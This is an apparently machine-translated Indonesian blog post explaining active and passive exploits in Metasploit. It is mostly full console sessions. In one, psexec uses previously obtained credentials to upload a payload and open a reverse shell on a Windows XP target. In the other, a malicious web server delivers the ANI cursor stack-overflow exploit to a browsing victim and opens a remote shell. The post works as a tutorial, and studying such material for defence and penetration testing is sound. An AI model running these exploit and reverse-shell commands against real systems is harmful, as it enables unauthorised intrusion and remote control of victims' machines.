- Exploitasi Aktif
eksploitasi Aktif akan mengeksploitasi host tertentu, berjalan sampai selesai, dan kemudian keluar.
- Eksekusi modul berhenti jika menemukan kesalahan.
- Modul brute force akan keluar ketika shell membuka dari korban.
- Anda dapat memaksa modul aktif untuk latar belakang dengan melewati 'j' untuk mengeksploitasi perintah:
msf exploit(ms08_067_netapi) > exploit -j [*] Exploit running as background job. msf exploit(ms08_067_netapi) >
Contoh:
Contoh berikut membuat penggunaan satu set sebelumnya diperoleh dari mandat untuk mengeksploitasi dan mendapatkan reverse shell pada sistem target.
msf exploit(psexec) > set RHOST 192.168.1.100 RHOST => 192.168.1.100 msf exploit(psexec) > set PAYLOAD windows/shell/reverse_tcp PAYLOAD => windows/shell/reverse_tcp msf exploit(psexec) > set LHOST 192.168.1.5 LHOST => 192.168.1.5 msf exploit(psexec) > set LPORT 4444 LPORT => 4444 msf exploit(psexec) > set SMBUSER victim SMBUSER => victim msf exploit(psexec) > set SMBPASS s3cr3t SMBPASS => s3cr3t msf exploit(psexec) > exploit [*] Connecting to the server... [*] Started reverse handler [*] Authenticating as user 'victim'... [*] Uploading payload... [*] Created \hikmEeEM.exe... [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.100[\svcctl] ... [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.100[\svcctl] ... [*] Obtaining a service manager handle... [*] Creating a new service (ciWyCVEp - "MXAVZsCqfRtZwScLdexnD")... [*] Closing service handle... [*] Opening service... [*] Starting the service... [*] Removing the service... [*] Closing service handle... [*] Deleting \hikmEeEM.exe... [*] Sending stage (240 bytes) [*] Command shell session 1 opened (192.168.1.5:4444 -> 192.168.1.100:1073) Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>
2. Passive Exploits
Pasif eksploitasi menunggu host masuk dan mengeksploitasi mereka saat mereka terhubung.
msf exploit(ani_loadimage_chunksize) > sessions -l Active sessions =============== Id Description Tunnel -- ----------- ------ 1 Meterpreter 192.168.1.5:52647 -> 192.168.1.100:4444 msf exploit(ani_loadimage_chunksize) > sessions -i 1 [*] Starting interaction with 1... meterpreter >
Contoh:
Output berikut menunjukkan setup untuk mengeksploitasi animasi kursor kerentanan. Mengeksploitasi tidak api sampai korban menelusuri ke situs berbahaya kami.
msf > use exploit/windows/browser/ani_loadimage_chunksize msf exploit(ani_loadimage_chunksize) > set URIPATH / URIPATH => / msf exploit(ani_loadimage_chunksize) > set PAYLOAD windows/shell/reverse_tcp PAYLOAD => windows/shell/reverse_tcp msf exploit(ani_loadimage_chunksize) > set LHOST 192.168.1.5 LHOST => 192.168.1.5 msf exploit(ani_loadimage_chunksize) > set LPORT 4444 LPORT => 4444 msf exploit(ani_loadimage_chunksize) > exploit [*] Exploit running as background job. [*] Started reverse handler [*] Using URL: http://0.0.0.0:8080/ [*] Local IP: http://192.168.1.5:8080/ [*] Server started. msf exploit(ani_loadimage_chunksize) > [*] Attempting to exploit ani_loadimage_chunksize [*] Sending HTML page to 192.168.1.100:1077... [*] Attempting to exploit ani_loadimage_chunksize [*] Sending Windows ANI LoadAniIcon() Chunk Size Stack Overflow (HTTP) to 192.168.1.100:1077... [*] Sending stage (240 bytes) [*] Command shell session 2 opened (192.168.1.5:4444 -> 192.168.1.100:1078) msf exploit(ani_loadimage_chunksize) > sessions -i 2 [*] Starting interaction with 2... Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\victim\Desktop>
0 komentar: